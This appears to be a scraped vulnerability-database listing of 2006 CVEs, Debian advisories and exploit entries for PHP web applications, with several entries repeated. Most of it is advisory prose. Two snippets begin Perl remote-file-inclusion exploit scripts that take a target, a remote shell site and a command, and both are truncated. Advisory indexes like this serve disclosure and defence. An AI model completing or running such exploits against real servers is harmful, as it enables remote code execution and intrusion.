CVE-2006-5443

Unspecified vulnerability in XIAO Gang WWW Interactive Mathematics Server WIMS before 3.60 allows remote attackers to modify unspecified data via unspecified vectors involving "variable rights."...

DEBIAN-CVE-2006-5443

Unspecified vulnerability in XIAO Gang WWW Interactive Mathematics Server WIMS before 3.60 allows remote attackers to modify unspecified data via unspecified vectors involving "variable rights."...

CVE-2006-5443

Unspecified vulnerability in XIAO Gang WWW Interactive Mathematics Server WIMS before 3.60 allows remote attackers to modify unspecified data via unspecified vectors involving "variable rights."...

CVE-2006-5443

Unspecified vulnerability in XIAO Gang WWW Interactive Mathematics Server WIMS before 3.60 allows remote attackers to modify unspecified data via unspecified vectors involving "variable rights."...

Serendipity -- XSS Vulnerabilities

The Serendipity Team reports: Serendipity failed to correctly sanitize user input on the media manager administration page. The content of GET variables were written into JavaScript strings. By using standard string evasion techniques it was possible to execute arbitrary JavaScript. Additionally...

[ECHO_ADV_46$2006] P-Book <= 1.17 (pb_lang) Remote File Inclusion

ECHOADV56$2006 ------------------------------------------------------------------------ ----- ECHOADV46$2006 P-Book = 1.17 pblang Remote File Inclusion ------------------------------------------------------------------------ ------ Author : Ahmad Maulana a.k.a Matdhule Date Found : October, 18th...

Segue CMS <= 1.5.8 (themesdir) Remote File Include Vulnerability

No description provided by source. +------------------------------------------------------------------------------------------- + Segue CMS = 1.5.8 themesdir Remote File Include Vulnerability +------------------------------------------------------------------------------------------- + Affected...

CVE-2006-5327

Untrusted search path vulnerability in OpenBase SQL 10.0 and earlier, as used in Apple Xcode 2.2 2.2 and earlier and possibly other products, allows local users to execute arbitrary code via a modified PATH that references a malicious gzip program, which is executed by gnutar with certain...

PHPmybibli 3.0.1 - Multiple Remote File Inclusions

\ /\ \ / | \ \ | / \ // / | \ | \ \ Y / | \ / / \ /| /\ / / / / / .OR.ID ECHOADV55$2006 ----------------------------------------------------------------------------------------------- ECHOADV55$2006Phpmybibli =2.1 Multiple Remote File Inclusion Vulnerability...

PHPmybibli 3.0.1 - Multiple Remote File Inclusions

PHPmybibli 3.0.1 - Multiple Remote File Inclusions \ /\ \ / | \ \ | / \ // / | \ | \ \ Y / | \ / / \ /| /\ / / / / / .OR.ID ECHOADV55$2006 ----------------------------------------------------------------------------------------------- ECHOADV55$2006Phpmybibli =2.1 Multiple Remote File...

PHPmybibli <= 3.0.1 Multiple Remote File Inclusion Vulnerabilities

No description provided by source. \ /\ \ / | \ \ | / \ // / | \ | \ \ Y / | \ / / \ /| /\ / / / / / .OR.ID ECHOADV55$2006 ----------------------------------------------------------------------------------------------- ECHOADV55$2006Phpmybibli =2.1 Multiple Remote File Inclusion...

Osprey <= 1.0 GetRecord.php Remote File Include Vulnerability

Exploit for unknown platform in category web applications ============================================================= Osprey = 1.0 GetRecord.php Remote File Include Vulnerability =============================================================...

CampSite 2.6.1 - g_documentRoot Remote File Inclusion

CampSite 2.6.1 - gdocumentRoot Remote File Inclusion --------------------------------------------------------------------------- CampSite - BugReporter = 2.6.1 Remote File Include Vulnerability --------------------------------------------------------------------------- Discovered By Kw3RLn Romani...

phpBurningPortal 1.0.1 - &#039;lang_path&#039; Remote File Inclusion

!/usr/bin/perl use LWP::UserAgent; use LWP::Simple; $target = @ARGV0; $shellsite = @ARGV1; $shellcmd = @ARGV2; $fileno = @ARGV3; if!$target || !$shellsite usage; header; if $fileno eq 1 $file = "questdelete.php?langpath="; elsif $fileno eq 2 $file = "questedit.php?langpath="; elsif $fileno eq 3...

Debian DSA-1075-1 : awstats - programming error

Hendrik Weimer discovered that awstats can execute arbitrary commands under the user id the web-server runs when users are allowed to supply arbitrary configuration files. Even though, this bug was referenced in DSA 1058 accidentally, it was not fixed yet. The new default behaviour is not to acce...

Debian DSA-1154-1 : squirrelmail - variable overwriting

James Bercegay of GulfTech Security Research discovered a vulnerability in SquirrelMail where an authenticated user could overwrite random variables in the compose script. This might be exploited to read or write the preferences or attachment files of other users. %NASLMINLEVEL 70300 C Tenable...

Debian DSA-1096-1 : webcalendar - uninitialised variable

A vulnerability has been discovered in webcalendar, a PHP-based multi-user calendar, that allows a remote attacker to execute arbitrary PHP code when registerglobals is turned on. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text and package checks in this plugin were...

Redaction System 1.0 - lang_prefix Remote File Inclusion

Redaction System 1.0 - langprefix Remote File Inclusion !/usr/bin/perl use LWP::UserAgent; $target = @ARGV0; $shellsite = @ARGV1; $shellcmd = @ARGV2; $fileno = @ARGV3; if!$target || !$shellsite usage; header; if $fileno eq 1 $file = " conn.php?langprefix="; elsif $fileno eq 2 $file =...

Sun Solaris NSPR library privilege escalation

Environment variable is used for log filename...

Echo Security Advisory 2006.49

ECHOADV49$2006 ----------------------------------------------------------------------------------------------- ECHOADV49$2006OpenDock Easy Doc =1.4 docdirectory Multiple Remote File Inclusion Vulnerability...